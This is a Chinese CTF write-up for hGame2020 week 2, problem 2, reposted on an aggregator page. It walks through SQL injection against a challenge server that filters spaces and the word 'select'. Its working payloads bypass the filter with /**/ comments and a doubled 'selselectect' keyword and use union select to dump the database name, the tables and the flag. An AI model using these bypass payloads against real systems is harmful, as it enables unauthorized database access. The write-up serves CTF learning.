hGame2020第二周第二题题解 - 代码天地

hGame2020第二周第二题题解

其他 2020-03-22 23:17:30 阅读次数: 0

进入页面发现id=1的时候出现如图内容，id=2时会变化

点击并拖拽以移动

然后测试几个常见的过滤点：

1.测试空格，测试如下图，变成了12说明过滤了空格

id=1 2

点击并拖拽以移动

2.测试select如下图:发现select被过滤掉了,同理测试union发现可以使用union

id=1select

点击并拖拽以移动

3.爆数据库名easysql

id=123%27/**/union/**/selselectect/**/database();%23

点击并拖拽以移动

4.爆库内表名:f1aggggggggggggg

http://139.199.182.61/index.php?
id=%27union/**/selselectect/**/table_name/**/from/**/
information_schema.tables/**/where/**/table_schema=%27easysql%27;%23

点击并拖拽以移动

5.试一下表里面能查到什么

 id=%27union/**/selselectect/**/*/**/from/**/f1aggggggggggggg;%23

点击并拖拽以移动

得到flag

http://139.199.182.61/index.php?
id=%27union/**/selselectect/**/table_name/**/from/**/
information_schema.tables/**/where/**/table_schema=%27easysql%27;%23

猜你喜欢

转载自www.cnblogs.com/h3zh1/p/12549172.html

hGame2020第二周第二题题解

hGame2020第二周第一题题解

hGame2020第一周题解

2020 第二周

第二周作业 A题

CSP-J2020第二题（直播获奖）题解

USACO2020DEC第二题（Daisy Chains）题解

第二周周测题解

20181221第二周周训题

2020第二周美赛感想

CF练习——2020暑假第二周

第二次周赛第二题

HGAME2020 Week3 Writeup

HGAME2020 Week1 Writeup

HGAME2020 Week4 Writeup

第二周HDU - 2091题解

第二周HDU-6292题解

第二周HDU-1232题解

第二周HDU-2099题解

第二周HDU-2055题解

第二周CodeForces-131A题解

第二周CodeForces - 110A题解

第二周HDU-2019题解

第二周HDU-2010题解

第二周HDU-1004题解

第二周HDU-2057题解

2020第二场NOIP|题解

第二周算法题思路总结

leetcode刷题系列第二周

第二周作业 B题

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)